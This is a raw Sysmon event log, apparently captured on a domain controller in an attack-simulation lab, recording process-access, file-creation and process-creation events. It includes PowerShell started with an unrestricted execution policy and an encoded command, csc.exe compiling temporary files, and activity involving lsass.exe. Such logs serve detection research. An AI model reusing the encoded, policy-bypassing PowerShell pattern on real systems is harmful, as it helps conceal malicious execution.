13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.200{59A5CD1D-8E1D-6005-C602-00000000A201}36764856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c19a9|UNKNOWN(00007FFA402DB68F) 154100x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.207{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths 
@"C:\Users\ADMINI~1\AppData\Local\Temp\fdypqgxp.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 11241100x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\fdypqgxp.cmdline2021-01-18 13:33:18.200 11241100x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:18.200{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\fdypqgxp.dll2021-01-18 13:33:18.200 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.763{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.763{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.747{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CF02-00000000A201}4088C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:19.622{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CF02-00000000A201}4088C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8E1F-6005-CE02-00000000A201}37204528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1F-6005-CF02-00000000A201}4088C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95c9331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+950f4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95152edb(wow
64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951363d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95128356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95134889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9513447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511a2a7(wow64) 154100x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.628{59A5CD1D-8E1F-6005-CF02-00000000A201}4088C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|